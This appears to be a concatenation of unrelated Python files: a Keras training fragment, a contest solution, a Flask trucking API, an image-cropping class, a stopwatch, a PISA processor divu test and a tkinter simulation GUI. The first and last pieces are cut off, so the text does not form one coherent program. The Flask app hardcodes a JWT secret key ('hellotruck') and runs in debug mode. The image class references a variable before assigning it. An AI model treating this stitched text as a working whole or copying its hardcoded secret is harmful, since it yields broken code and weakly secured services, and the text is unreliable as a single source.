model.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy']) # Creates the model given everything above
model.fit(train_data, train_label, epochs=6) # Trains the model created above, Epochs = how many times are we gonna run the model with the same data
# Evaluates the loss and accuracy of the model as we go and prints it out
loss, accuracy = model.evaluate(test_data, test_label)
print(accuracy)
print(loss)
model.save('digits_detect.model') # Saves the model so I don't have to rerun it everytime I wanna use it |
#import sys
#input = sys.stdin.readline
def main():
a, b, c = map( int, input().split())
if a%2 == 0 or b%2 == 0 or c%2 == 0:
print(0)
else:
print( min(a*b, b*c, c*a))
if __name__ == '__main__':
main()
|
__author__='RodrigoMachado'
__license__ = "MIT"
__version__ = "1.0.1"
__status__ = "Production"
__copyright__ = "Copyright 2019"
__maintainer__ = "RodrigoMachado9"
__email__ = "rodrigo.machado3.14@hotmail.com"
__credits__ = ["Python is life", "Live the opensource world"]
from flask import Flask, jsonify
from flask_restful import Api
#todo; resources
from resources.motorista import Motoristas, Motorista, MotoristasLocalCarga, CaminhoneirosVeiculoProprio, \
CaminhoneirosOrigemDestino, CaminhoneiroAvaliacao, CaminhoneirosDisponiveis
from resources.usuario import User, UserRegister, UserLogin, UserLogout, Users
from resources.tipoveiculo import TipoVeiculos, TipoVeiculo
from resources.veiculo import Veiculos, Veiculo
#todo; construir endpoint => veiculo, status_veiculo
from resources.statusveiculo import Status, StatusVeiculo
from resources.carga import Cargas, Carga
from resources.localcarga import LocalCargas, LocalCarga
from resources.transporte import Transportes, Transporte
# todo-> flask_jwt_extended :: será responsável por cuidar de toda parte de tokenização
from flask_jwt_extended import JWTManager
#todo guarda o token para futura verificação
from blacklist import BLACKLIST
app = Flask(__name__)
#todo sqlite -> migration to postgres
app.config['SQLALCHEMY_DATABASE_URI'] ='sqlite:///dummy.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['JWT_SECRET_KEY'] = 'hellotruck'
app.config['JWT_BLACKLIST_ENABLED'] = True
api = Api(app)
jwt = JWTManager(app)
@app.before_first_request
def cria_banco():
banco.create_all()
@jwt.token_in_blacklist_loader
def verifica_blacklist(token):
return token['jti'] in BLACKLIST
@jwt.revoked_token_loader
def token_de_acesso_invalidado():
return jsonify({"message":"You have been logged out!"}), 401 # unauthorized
#routes ...
api.add_resource(MotoristasLocalCarga, '/motoristas/local_carga/motoristas_sem_carga')
api.add_resource(CaminhoneirosVeiculoProprio, '/motoristas/motoristas_com_veiculo_proprio')
api.add_resource(CaminhoneirosOrigemDestino, '/motoristas/local_carga/veiculo/origem_destino')
api.add_resource(CaminhoneiroAvaliacao, '/motoristas/top_motoristas')
api.add_resource(CaminhoneirosDisponiveis, '/motoristas/status_veiculo/motoristas_disponiveis')
api.add_resource(Motoristas, '/motoristas')
api.add_resource(Motorista, '/motorista/<int:motorista_id>')
api.add_resource(Users, '/usuarios')
api.add_resource(User, '/usuarios/<int:user_id>')
api.add_resource(UserRegister, '/cadastro')
api.add_resource(UserLogin, '/login')
api.add_resource(UserLogout, '/logout')
api.add_resource(TipoVeiculos, '/tipo_veiculos')
api.add_resource(TipoVeiculo, '/tipo_veiculo/<int:tipo_veiculo_id>')
api.add_resource(Veiculos, '/veiculos')
api.add_resource(Veiculo, '/veiculo/<int:veiculo_id>')
api.add_resource(Status, '/status')
api.add_resource(StatusVeiculo, '/status_veiculo/<int:status_id>')
api.add_resource(Cargas, '/cargas')
api.add_resource(Carga, '/carga/<int:carga_id>')
api.add_resource(LocalCargas, '/local_cargas')
api.add_resource(LocalCarga, '/local_carga/<int:local_carga_id>')
api.add_resource(Transportes, '/transportes')
api.add_resource(Transporte, '/transporte/<int:transporte_id>')
if __name__ == '__main__':
#todo debug == true, apenas enquanto em desenvolvimento.
from sql_alchemy import banco
banco.init_app(app)
app.run(debug=True)
|
#-*- coding: utf-8 -*-
from pathlib import Path
from PIL import Image
import json
import statistics
import os
import sys
class Gatherer():
def __init__(self, name, model, segmentSize, pixelSize):
self.name = name
self.segmentSize = segmentSize
self.pixelSize = pixelSize
self.imageFolder = "../Images/"
self.folder = "../Images/" + name + "/"
self.model = model
def initFolder(self):
#create images folder if doesn't exists
imagesPath = Path(self.imageFolder)
if not imagesPath.exists():
print("Creating " + str(originalPath) + "...")
originalPath.mkdir()
#create images name folder if doesn't exists
imagesNamePath = Path(self.folder)
if not imagesNamePath.exists():
print("Creating " + str(imagesNamePath) + "...")
imagesNamePath.mkdir()
# create folder if doesn't exist
originalPath = Path(self.folder + "/Originals/")
if not originalPath.exists():
print("Creating " + str(originalPath) + "...")
originalPath.mkdir()
# create cropped folder if doesn't exist
resizedPath = Path(self.folder + "/Resized/")
if not resizedPath.exists():
print("Creating " + str(resizedPath) + "...")
resizedPath.mkdir()
# check if directory is empty
if not list(originalPath.glob('*')):
sys.exit("The directory " + str(self.name) + " is empty or has just been created. Please fill it will pictures.")
# get a list of all JPG and convert them to PNG
jpgList = list(originalPath.glob('*.jpg'))
if(jpgList != []):
for jpg in jpgList:
self.convertJpgPng(jpg, originalPath)
# resize all images to widthSize x heightSize px
pngList = list(originalPath.glob('*.png'))
widthSize = heightSize = self.segmentSize
for png in pngList:
image = Image.open(png)
if image.size[0] != widthSize and image.size[1] != heightSize:
print("cropping " + png.stem + " to " + str(self.segmentSize) + " px...")
resizedImage = self.cropImage(image, widthSize, heightSize)
# the image now has a resolution of self.segmentSize x self.segmentSize px
resizedImage.save(str(resizedPath) + "/" + png.stem + ".png")
def convertJpgPng(self, jpg, path):
image = Image.open(str(jpg))
print("saving " + jpg.stem + ".png !")
image.save(str(path) + "/" + jpg.stem + ".png")
print("deleting " + jpg.stem + ".jpg !")
os.remove(jpg)
def cropImage(self, image, widthSize, heightSize):
resizedImage = None
if (image.size[0] > image.size[1]):
heightPercent = heightSize/image.size[1]
widthSize = int(heightPercent*image.size[0])
resizedImage = image.resize((widthSize,heightSize), Image.ANTIALIAS)
left = (resizedImage.size[0] - heightSize)/2
top = 0
right = (resizedImage.size[0] - heightSize)/2 + heightSize
bottom = resizedImage.size[1]
resizedImage = resizedImage.crop((left, top, right, bottom))
else:
widthPercent = widthSize/image.size[0]
heightSize = int(widthPercent*image.size[1])
resizedImage = image.resize((widthSize,heightSize), Image.ANTIALIAS)
left = 0
top = (resizedImage.size[1] - widthSize)/2
right = resizedImage.size[0]
bottom = (resizedImage.size[1] - widthSize)/2 + widthSize
resizedImage = resizedImage.crop((left, top, right, bottom))
return resizedImage
def colorDetector(self, rgb_im, jsonImage, scale, size = None, x = 0, y = 0):
if size is None:
size = rgb_im.size[0]
red = []
blue = []
green = []
jsonImage["RGB"] = []
for raw in range(y, y + size, scale):
for column in range(x, x + size, scale):
rgbValues = rgb_im.getpixel((column, raw))
red.append(rgbValues[0])
blue.append(rgbValues[1])
green.append(rgbValues[2])
jsonImage["RGB"].append(str(int(statistics.mean(red))))
jsonImage["RGB"].append(str(int(statistics.mean(green))))
jsonImage["RGB"].append(str(int(statistics.mean(blue))))
return jsonImage # type of JSON : {'RGB': ['255', '0', '0']}
def resizeMiddle(self, rgb_image, pixelSize):
deltaWidth = rgb_image.size[0] % pixelSize
deltaHeight = rgb_image.size[1] % pixelSize
# resize image to fit pixelSize x pixelSize cutting
if deltaWidth % 2:
rgb_image = rgb_image.crop((int(deltaWidth/2) + 1, 0, rgb_image.size[0] - int(deltaWidth/2), rgb_image.size[1]))
print("new:", rgb_image.size[0])
else:
rgb_image = rgb_image.crop((deltaWidth/2, 0, rgb_image.size[0] - deltaWidth/2, rgb_image.size[1]))
if deltaHeight % 2:
rgb_image = rgb_image.crop((0, int(deltaHeight/2) + 1, rgb_image.size[0], rgb_image.size[1] - int(deltaHeight/2)))
else:
rgb_image = rgb_image.crop((0, deltaHeight/2, rgb_image.size[0], rgb_image.size[1] - deltaHeight/2))
return rgb_image
def smallColorDetector(self):
imagesPath = Path(self.folder + "/Resized/")
ImagesInfoPath = Path(self.imageFolder + "/imagesInfo/")
if not ImagesInfoPath.exists():
print("Creating " + str(ImagesInfoPath) + "...")
ImagesInfoPath.mkdir()
imagesList = list(imagesPath.glob('*.png'))
imagesInfoJson = json.loads('[]') # gloal JSON
for image in imagesList:
im = Image.open(image)
rgb_im = im.convert('RGB')
imageInfoJson = json.loads('{}') # focus JSON
imageInfoJson[str(image.stem) + ".png"] = str(self.colorDetector(rgb_im, json.loads('{}'), 5))
imagesInfoJson.append(imageInfoJson)
# JSON at this point : [{'image1': {'RGB': ['255', '0', '0']}},
# {'image2': {'RGB': ['0', '255', '0']}}]
# storage of json in ImagesInfo json file
with open(str(ImagesInfoPath) + "/" + str(self.name) + ".json", "w") as outfile:
json.dump(imagesInfoJson, outfile)
def modelColorDetector(self):
modelPath = Path(self.imageFolder + "/models/")
ImagesInfoPath = Path(self.imageFolder + "/imagesInfo/")
if not ImagesInfoPath.exists():
print("Creating " + str(ImagesInfoPath) + "...")
ImagesInfoPath.mkdir()
if not modelPath.exists():
print("Creating " + str(modelPath) + "...")
modelPath.mkdir()
modelJpgPath = Path(str(modelPath) + "/" + self.model + '.jpg')
if modelJpgPath.is_file():
self.convertJpgPng(modelJpgPath, modelPath)
modelImagePath = Path(str(modelPath) + "/" + self.model + ".png")
print(modelJpgPath)
if not modelImagePath.is_file():
print(modelImagePath)
sys.exit("The model image does not exist, exiting...")
pixelSize = self.pixelSize
image = Image.open(modelImagePath)
rgb_image = self.resizeMiddle(image.convert('RGB'), pixelSize)
jsonImages = json.loads('[]') # global JSON
rawNbr = 1
for raw in range(0, rgb_image.size[1], pixelSize):
jsonRaw = json.loads('{}')
jsonRaw["raw" + str(rawNbr)] = []
for column in range(0, rgb_image.size[0], pixelSize):
jsonRaw["raw" + str(rawNbr)].append(self.colorDetector(rgb_image, json.loads('{}'), 2, pixelSize, column, raw))
rawNbr+=1
jsonImages.append(jsonRaw) # append each raw in the global JSON
with open(str(ImagesInfoPath) + "/" + self.model + ".json", "w") as outfile:
json.dump(jsonImages, outfile)
|
'''
Created on Jul 4, 2019
Edited 8/30/19
mildly edited 11/1/19 and 11/12/19
@author: Jacob H.
stopwatch.py
'''
import time
import math
# add a change_precision?
class Stopwatch:
'''
Represents a stopwatch object; counts time up (as in 1, 2, 3, etc.) and reports elapsed time to a specified precision
'''
# a Stopwatch's default decimal place is the tenths place and default starting condition is "off"
def __init__ (self, precision : int = 1, offset : float = 0.0, on : bool = False):
# variable to track the decimal precision of the timer; ranges from [0,3] [digits after the potential radix]
self._precision = precision
# variable to track whether the stopwatch should be counting up or not
self._on = on
# =========================================================================================================
# time.perf_counter_ns() returns an int of the nanoseconds of the current processor time
# time.perf_counter() returns a float with the seconds of the current processor time
# time.perf_counter_ns() / 1_000_000 returns a float of the milliseconds of the current processor time
# =========================================================================================================
# variable that notes a time in seconds that the stopwatch starts on
self._start = time.perf_counter() if on else 0.0
# float; _time is the time elapsed while on, and is only updated when the timer is paused
# self._time = 0.0
self._time = offset
# float; _offset is the time the stopwatch begins at; default is 0.0, but that could change
# i.e. offset < 0 indicates a countdown like 3, 2, 1, go
# self._offset = offset
self._offset = offset
# split is overriden in the child class; Stopwatch.split resets both the start and offset values without changing the on value
# start is based on the processor clock, so no parameter for _start is needed
# split() returns the time of the split
def split (self, offset : float):
split_time = self.get_time()
self._start = time.perf_counter()
self._offset = offset
return split_time
# pauses the stopwatch and assigns _time to _offset to account for the changed _start when start() is called
def pause (self):
Stopwatch.update(self)
self._on = False
self._offset = self._time
# starts the stopwatch and sets the starting time value
def start (self):
# order matters?
if not self._on:
self._start = time.perf_counter()
self._on = True
# resets the times and turns the stopwatch off
def reset (self, offset : float = 0.0):
# self._time = 0.0
# self._offset = offset
self._time = offset
self._offset = offset
self._on = False
# adds to time the difference between time.perf_counter() and self._start
def update (self):
if self._on:
self._time = time.perf_counter() - self._start + self._offset
# returns the time based on self._precision (number of decimals to include)
# get_time is the only place where self._precision matters
# minor bug is that when precision > 1, trailing zeroes of floats are omitted (easy fix with str() and concatenation)
def get_time (self):
Stopwatch.update(self) # why did I do this? Couldn't I have just done self.update()?? whatever no big deal
# algorithm to always round down
t = math.floor(self._time * 10**self._precision) / 10**self._precision
return t if self._precision > 0 else int(t)
def get_precision (self):
return self._precision
def set_precision (self, p):
self._precision = p
def is_on (self):
return self._on
# testing/debug shenanigans
if __name__ == '__main__':
input('Enter/Return:\n')
print('test start and update')
timer5 = Stopwatch(2, on = True)
timer = Stopwatch()
timer.start()
while timer.get_time() < 0.1:
pass
print(f'1: {timer.get_time()}') # 0.1
while timer.get_time() < 0.5:
pass
print(f'1: {timer.get_time()}') # 0.5
print('\ntest pause(s)')
timer.pause()
timer2 = Stopwatch(on = True)
while timer2.get_time() < 0.2:
pass
print(f'1: {timer.get_time()}') # 0.5
print(f'2: {timer2.get_time()}') # 0.2
timer.start()
while timer2.get_time() < 0.3:
pass
print(f'2: {timer2.get_time()}') # 0.3
timer.pause()
print(f'1: {timer.get_time()}') # 0.6
while timer2.get_time() < 0.6:
pass
print(f'1: {timer.get_time()}') # 0.6
print(f'2: {timer2.get_time()}') # 0.6
timer.start()
print('\ntest precision')
timer3 = Stopwatch(2, on = True)
while timer3.get_time() < 0.15:
pass
print(f'3: {timer3.get_time()}') # 0.15
print('\ntest reset')
timer2.reset()
timer2.start()
while timer2.get_time() < 0.2:
pass
print(f'1: {timer.get_time()}') # > 0.6, probs 0.9
print(f'2: {timer2.get_time()}') # 0.2
print(f'3: {timer3.get_time()}') # 0.35 or so
print('\ntest negative offset')
timer4 = Stopwatch(2, -2.0, True)
while timer4.get_time() < -1.0:
pass
print(f'4: {timer4.get_time()}') # -1.0
timer4.pause()
while timer2.get_time() < 1.7: # 0.5 second pause
pass
print(f'2: {timer2.get_time()}') # 1.7
timer4.start()
while timer4.get_time() < 0:
pass
print(f'4: {timer4.get_time()}') # 0.0
#while timer4.get_time() < 5.55:
#pass
input('\nEnter/Return:\n')
print(f'actual time-keeping test\n4: {timer5.get_time()}') # ≥ 3.95
|
#=========================================================================
# pisa_divu_test.py
#=========================================================================
import pytest
import random
import pisa_encoding
from pymtl import Bits
from PisaSim import PisaSim
from pisa_inst_test_utils import *
#-------------------------------------------------------------------------
# gen_basic_test
#-------------------------------------------------------------------------
def gen_basic_test():
return """
mfc0 r1, mngr2proc < 20
mfc0 r2, mngr2proc < 4
nop
nop
nop
nop
nop
nop
nop
nop
divu r3, r1, r2
nop
nop
nop
nop
nop
nop
nop
nop
mtc0 r3, proc2mngr > 5
nop
nop
nop
nop
nop
nop
nop
nop
"""
#-------------------------------------------------------------------------
# gen_dest_byp_test
#-------------------------------------------------------------------------
def gen_dest_byp_test():
return [
gen_rr_dest_byp_test( 5, "divu", 2, 2, 1 ),
gen_rr_dest_byp_test( 4, "divu", 4, 2, 2 ),
gen_rr_dest_byp_test( 3, "divu", 6, 2, 3 ),
gen_rr_dest_byp_test( 2, "divu", 8, 2, 4 ),
gen_rr_dest_byp_test( 1, "divu", 10, 2, 5 ),
gen_rr_dest_byp_test( 0, "divu", 12, 2, 6 ),
]
#-------------------------------------------------------------------------
# gen_src0_byp_test
#-------------------------------------------------------------------------
def gen_src0_byp_test():
return [
gen_rr_src0_byp_test( 5, "divu", 14, 2, 7 ),
gen_rr_src0_byp_test( 4, "divu", 16, 2, 8 ),
gen_rr_src0_byp_test( 3, "divu", 18, 2, 9 ),
gen_rr_src0_byp_test( 2, "divu", 20, 2, 10 ),
gen_rr_src0_byp_test( 2, "divu", 22, 2, 11 ),
gen_rr_src0_byp_test( 0, "divu", 24, 2, 12 ),
]
#-------------------------------------------------------------------------
# gen_src1_byp_test
#-------------------------------------------------------------------------
def gen_src1_byp_test():
return [
gen_rr_src1_byp_test( 5, "divu", 26, 2, 13 ),
gen_rr_src1_byp_test( 4, "divu", 28, 2, 14 ),
gen_rr_src1_byp_test( 3, "divu", 30, 2, 15 ),
gen_rr_src1_byp_test( 2, "divu", 32, 2, 16 ),
gen_rr_src1_byp_test( 1, "divu", 34, 2, 17 ),
gen_rr_src1_byp_test( 0, "divu", 36, 2, 18 ),
]
#-------------------------------------------------------------------------
# gen_srcs_byp_test
#-------------------------------------------------------------------------
def gen_srcs_byp_test():
return [
gen_rr_srcs_byp_test( 5, "divu", 38, 2, 19 ),
gen_rr_srcs_byp_test( 4, "divu", 40, 2, 20 ),
gen_rr_srcs_byp_test( 3, "divu", 42, 2, 21 ),
gen_rr_srcs_byp_test( 2, "divu", 44, 2, 22 ),
gen_rr_srcs_byp_test( 1, "divu", 46, 2, 23 ),
gen_rr_srcs_byp_test( 0, "divu", 48, 2, 24 ),
]
#-------------------------------------------------------------------------
# gen_srcs_dest_test
#-------------------------------------------------------------------------
def gen_srcs_dest_test():
return [
gen_rr_src0_eq_dest_test( "divu", 50, 25, 2 ),
gen_rr_src1_eq_dest_test( "divu", 52, 26, 2 ),
gen_rr_src0_eq_src1_test( "divu", 2, 1 ),
gen_rr_srcs_eq_dest_test( "divu", 3, 1 ),
]
#-------------------------------------------------------------------------
# gen_value_test
#-------------------------------------------------------------------------
def gen_value_test():
return [
# Zero and one operands
gen_rr_value_test( "divu", 0, 1, 0 ),
gen_rr_value_test( "divu", 1, 1, 1 ),
# Positive evenly-divisible operands
gen_rr_value_test( "divu", 546, 42, 13 ),
gen_rr_value_test( "divu", 63724, 716, 89 ),
gen_rr_value_test( "divu", 167882820, 20154, 8330 ),
# Positive not evenly-divisible operands
gen_rr_value_test( "divu", 50, 546, 0 ),
gen_rr_value_test( "divu", 546, 50, 10 ),
gen_rr_value_test( "divu", 63724, 793, 80 ),
gen_rr_value_test( "divu", 167882820, 20150, 8331 ),
# Test that operands are treated as unsigned
gen_rr_value_test( "divu", 0x00000000, 0xffffffff, 0x00000000 ),
gen_rr_value_test( "divu", 0xffffffff, 0xffffffff, 0x00000001 ),
gen_rr_value_test( "divu", 0x0a01b044, 0xffffb14a, 0x00000000 ),
gen_rr_value_test( "divu", 0xdeadbeef, 0x0000beef, 0x00012a90 ),
gen_rr_value_test( "divu", 0xf5fe4fbc, 0x00004eb6, 0x00032012 ),
gen_rr_value_test( "divu", 0xf5fe4fbc, 0xffffb14a, 0x00000000 ),
]
#-------------------------------------------------------------------------
# gen_random_test
#-------------------------------------------------------------------------
def gen_random_test():
asm_code = []
for i in xrange(100):
src0 = Bits( 32, random.randint(0,0xffffffff) )
src1 = Bits( 32, random.randint(0,0xffffffff) )
dest = Bits( 32, src0 / src1 )
asm_code.append( gen_rr_value_test( "divu", src0.uint(), src1.uint(), dest.uint() ) )
return asm_code
#-------------------------------------------------------------------------
# test_basic
#-------------------------------------------------------------------------
@pytest.mark.parametrize( "name,test", [
asm_test( gen_basic_test ),
asm_test( gen_dest_byp_test ),
asm_test( gen_src0_byp_test ),
asm_test( gen_src1_byp_test ),
asm_test( gen_srcs_byp_test ),
asm_test( gen_srcs_dest_test ),
asm_test( gen_value_test ),
asm_test( gen_random_test ),
])
def test( name, test ):
sim = PisaSim( trace_en=True )
sim.load( pisa_encoding.assemble( test() ) )
sim.run()
|
# coding: utf-8
from environnement import *
from threading import Thread
import tkinter
from tkinter import messagebox, ttk, filedialog
import os
import moviepy.video.io.ImageSequenceClip as Movieclip
# import gc --> gc.collect()
def new_label_frame(master_frame, title: str, weight_rows: list, weight_columns: list):
frame = tkinter.LabelFrame(master_frame,
text=title,
font=TK_FRAME_FONT)
for row, weight in enumerate(weight_rows):
frame.rowconfigure(row, weight=weight)
for column, weight in enumerate(weight_columns):
frame.columnconfigure(column, weight=weight)
return frame
def new_top_frame(master_frame, size, caption, title, weight_rows: list, weight_columns: list):
frame = tkinter.Toplevel(master_frame)
frame.geometry(size)
frame.title(caption)
titre = tkinter.Label(frame,
text=title,
font=TK_TITLE_2_FONT)
for row, weight in enumerate(weight_rows):
frame.rowconfigure(row, weight=weight)
for column, weight in enumerate(weight_columns):
frame.columnconfigure(column, weight=weight)
titre.grid(column=0, row=0, columnspan=len(weight_columns), sticky="nsew")
return frame
def new_scale_config(master_frame, config, variable):
return tkinter.Scale(master_frame,
orient="horizontal",
from_=DIC_CONFIGURATIONS[config][PARAM_MIN_VALUE],
to=DIC_CONFIGURATIONS[config][PARAM_MAX_VALUE],
resolution=DIC_CONFIGURATIONS[config][PARAM_STEP],
font=TK_LABEL_FONT,
label=DIC_CONFIGURATIONS[config][PARAM_LABEL],
variable=variable)
def new_config_label_frame(master_frame, dic_tkvar: dict, type_frame: int):
liste_config = DIC_LABEL_FRAME_CONFIGURATIONS[type_frame][PARAM_LISTE_CONFIG]
frame = new_label_frame(master_frame, DIC_LABEL_FRAME_CONFIGURATIONS[type_frame][PARAM_TITRE],
[1] * len(liste_config), [1])
for i, config in enumerate(liste_config):
if DIC_CONFIGURATIONS[config][PARAM_TYPE] == bool:
check_button = tkinter.Checkbutton(frame,
text=DIC_CONFIGURATIONS[config][PARAM_LABEL],
font=TK_LABEL_FONT,
variable=dic_tkvar[config])
check_button.grid(row=i, column=0, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsw")
else:
scale = new_scale_config(frame, config, dic_tkvar[config])
scale.grid(row=i, column=0, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
return frame
def new_scale(master_frame, type_scale, variable):
return tkinter.Scale(master_frame,
orient="horizontal",
from_=DIC_SCALE[type_scale][PARAM_MIN_VALUE],
to=DIC_SCALE[type_scale][PARAM_MAX_VALUE],
resolution=DIC_SCALE[type_scale][PARAM_STEP],
variable=variable,
font=TK_LABEL_FONT,
label=DIC_SCALE[type_scale][PARAM_LABEL])
def clear_images_moviepy(nom_dossier: str, nb_images):
for i in range(1, nb_images + 2):
chemin = f"{nom_dossier}/{i}{FORMAT_IMAGES}"
if os.path.exists(chemin):
os.remove(chemin)
os.rmdir(nom_dossier)
class Simulation:
def __init__(self):
self.app = tkinter.Tk()
self.num_simulation = 0
self.environnement = None
self.list_id_figs_matplotlib = []
self.running_simu = False
self.running_pygame = False
self.running_matplotbil = False
self.stop_enregistrement = tkinter.BooleanVar(self.app, value=False)
self.tk_var_stop_init_new_environnement = None
self.tk_valeurs_configurations = {conf: DIC_CONFIGURATIONS[conf][PARAM_DEFAULT_VALUE]
for conf in LISTE_CONFIGS}
self.tk_valeurs_caracteres_individus = {caractere: {param: DIC_CARACTERES_INDIVIDU[caractere][param]
for param in [PARAM_VALUE, PARAM_MIN_VALUE, PARAM_MAX_VALUE,
PARAM_PROBA_MUTATION, PARAM_DEGRE_MUTATION,
PARAM_ALEATOIRE]}
for caractere in LISTE_CARACTERES_INDIVIDU}
self.delay_simulation = tkinter.DoubleVar(value=DIC_SCALE[SCALE_SIMULATION_FPS][PARAM_DEFAULT_VALUE])
self.var_fps_pygame = tkinter.IntVar(value=DIC_SCALE[SCALE_PYGAME_FPS][PARAM_DEFAULT_VALUE])
self.var_fps_matplotlib = tkinter.IntVar(value=DIC_SCALE[SCALE_MATPLOTLIB_FPS][PARAM_DEFAULT_VALUE])
self.tk_buttons_simulation = {}
self.tk_buttons_pygame = {}
self.tk_buttons_matplotbil = {}
self.tk_nb_figs_matplotlib = tkinter.IntVar(self.app, 0)
self.chemin_videos = ""
self.init_tkinter_app()
self.new_environnement({conf: self.tk_valeurs_configurations[conf] for conf in LISTE_CONFIGS_SIMULATION_ONLY},
self.tk_valeurs_caracteres_individus)
# Tkinter
def init_tkinter_app(self):
self.app.geometry(TK_APP_SIZE)
self.app.title(TK_CAPTION_TEXT)
self.app.option_add("*TCombobox*Listbox.font", TK_LABEL_FONT)
self.app.protocol("WM_DELETE_WINDOW", self.quitter)
title = tkinter.Label(self.app,
text=TK_TITLE_TEXT,
font=TK_TITLE_FONT)
simulation_frame = new_label_frame(self.app, TK_SIMULATION_TEXT, [1, 1, 1, 1], [1, 1])
pygame_frame = new_label_frame(self.app, TK_PYGAME_TEXT, [1, 1], [1, 1])
matplotlib_frame = new_label_frame(self.app, TK_MATPLOTLIB_TEXT, [1, 1, 1], [1, 1])
def init_tkinter_simulation_frame():
start_button = tkinter.Button(simulation_frame,
text=TK_START_BUTTON_TEXT,
font=TK_BUTTON_FONT,
command=self.start_simulation)
stop_button = tkinter.Button(simulation_frame,
text=TK_STOP_BUTTON_TEXT,
font=TK_BUTTON_FONT,
command=self.stop_simulation,
state="disabled")
delay_scale = new_scale(simulation_frame, SCALE_SIMULATION_FPS, self.delay_simulation)
# --------------------------------------------------------
info_frame = new_label_frame(simulation_frame, "Informations", [1, 1], [1, 1, 1, 1])
Stats.tk_jour = tkinter.IntVar()
Stats.tk_nb_individus = tkinter.IntVar()
Stats.tk_nb_jours_par_min = tkinter.DoubleVar()
num_jour_label = tkinter.Label(info_frame,
textvariable=Stats.tk_jour,
width=4,
anchor="w",
font=TK_JOUR_LABEL_FONT)
jour_label = tkinter.Label(info_frame,
text=TK_JOUR_NUM_LABEL_TEXT,
font=TK_JOUR_LABEL_FONT)
jour_label.grid(row=0, column=0, rowspan=2, sticky="e")
num_jour_label.grid(row=0, column=1, rowspan=2, sticky="ew")
for j, (var, text) in enumerate([(Stats.tk_nb_individus, TK_LABEL_I_NB_INDIVIDUS),
(Stats.tk_nb_jours_par_min, TK_LABEL_I_NB_JOURS_PAR_MIN)]):
var_label = tkinter.Label(info_frame,
width=4,
anchor="e",
textvariable=var,
font=TK_LABEL_FONT)
label = tkinter.Label(info_frame,
text=text,
font=TK_LABEL_FONT)
var_label.grid(row=j, column=2, padx=TK_MARGE_WIDGET, sticky="ew")
label.grid(row=j, column=3, sticky="w")
# --------------------------------------------------------
new_button = tkinter.Button(simulation_frame,
text=TK_NEW_BUTTON_TEXT,
font=TK_BUTTON_FONT,
command=self.new_simulation_frame)
# config_button = tkinter.Button(simulation_frame,
# text=TK_CONFIG_BUTTON_TEXT,
# font=TK_BUTTON_FONT,
# command=self.configurations_button_action)
new_button.grid(row=3, column=0, columnspan=4, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
start_button.grid(row=0, column=0, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
stop_button.grid(row=0, column=1, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
delay_scale.grid(row=1, column=0, columnspan=2, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="ew")
info_frame.grid(row=2, column=0, columnspan=2, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
self.tk_buttons_simulation = {START_BUTTON: start_button,
NEW_BUTTON: new_button,
STOP_BUTTON: stop_button}
def init_tkinter_pygame_frame():
new_button = tkinter.Button(pygame_frame,
text=TK_NEW_BUTTON_TEXT,
font=TK_BUTTON_FONT,
command=self.new_pygame_fame)
stop_button = tkinter.Button(pygame_frame,
text=TK_STOP_BUTTON_TEXT,
font=TK_BUTTON_FONT,
command=self.stop_pygame,
state="disabled")
delay_scale = new_scale(pygame_frame, SCALE_PYGAME_FPS, self.var_fps_pygame)
new_button.grid(row=0, column=0, sticky="nsew", padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET)
stop_button.grid(row=0, column=1, sticky="nsew", padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET)
delay_scale.grid(row=1, column=0, columnspan=2, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="ew")
self.tk_buttons_pygame = {NEW_BUTTON: new_button,
STOP_BUTTON: stop_button}
def init_tkinter_matplotlib_frame():
start_button = tkinter.Button(matplotlib_frame,
text=TK_NEW_BUTTON_TEXT,
font=TK_BUTTON_FONT,
command=self.new_matplotlib_fame)
stop_button = tkinter.Button(matplotlib_frame,
text=TK_STOP_BUTTON_TEXT,
font=TK_BUTTON_FONT,
command=self.stop_matplotlib,
state="disabled")
delay_scale = new_scale(matplotlib_frame, SCALE_MATPLOTLIB_FPS, self.var_fps_matplotlib)
new_moviepy_button = tkinter.Button(matplotlib_frame,
text=TK_NEW_MOVIEPY_BUTTON_TEXT,
font=TK_BUTTON_FONT,
command=self.new_moviepy_frame,
state="disabled")
start_button.grid(row=0, column=0, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
stop_button.grid(row=0, column=1, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
delay_scale.grid(row=1, column=0, columnspan=2, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="ew")
new_moviepy_button.grid(row=2, column=0, columnspan=2, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET,
sticky="nsew")
self.tk_buttons_matplotbil = {START_BUTTON: start_button,
STOP_BUTTON: stop_button,
NEW_BUTTON: new_moviepy_button}
init_tkinter_simulation_frame()
init_tkinter_pygame_frame()
init_tkinter_matplotlib_frame()
button_quitter = tkinter.Button(self.app,
text=TK_QUITTER_BUTTON_TEXT,
font=TK_BUTTON_FONT,
command=self.quitter)
for i, weight in enumerate([1, 5]):
self.app.columnconfigure(i, weight=weight)
for i, weight in enumerate([1, 20, 19, 1]):
self.app.rowconfigure(i, weight=weight)
title.grid(row=0, column=0, columnspan=2, sticky="nsew")
simulation_frame.grid(row=1, column=0, rowspan=2, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
pygame_frame.grid(row=1, column=1, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
matplotlib_frame.grid(row=2, column=1, rowspan=2, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
button_quitter.grid(row=3, column=0, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
def run(self):
self.app.mainloop()
def quitter(self):
self.stop_simulation()
self.stop_pygame()
